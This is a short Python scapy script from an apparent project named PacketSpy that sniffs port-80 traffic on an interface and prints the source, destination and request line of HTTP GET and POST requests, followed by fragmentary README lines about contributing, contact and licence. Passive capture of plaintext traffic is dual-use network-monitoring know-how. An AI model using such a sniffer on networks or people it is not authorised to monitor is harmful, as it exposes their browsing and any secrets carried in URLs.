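# Run as root; it only observes traffic already visible on the chosen interface.
from scapy.all import sniff, IP, TCP, Raw

def show_http(pkt):
    if pkt.haslayer(IP) and pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt[TCP].dport == 80:
        payload = bytes(pkt[Raw].load)
        if payload.startswith((b"GET ", b"POST ")):
            request_line = payload.split(b"\r\n", 1)[0]
            print(f"{pkt[IP].src} -> {pkt[IP].dst}: {request_line.decode(errors='replace')}")

sniff(iface="eth0", filter="tcp port 80", prn=show_http, store=False)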
Contributions are welcome! To contribute to PacketSpy, follow these steps:
If you have any questions, comments, or suggestions about PacketSpy, please feel free to contact me:
PacketSpy is released under the MIT License. See LICENSE for more information.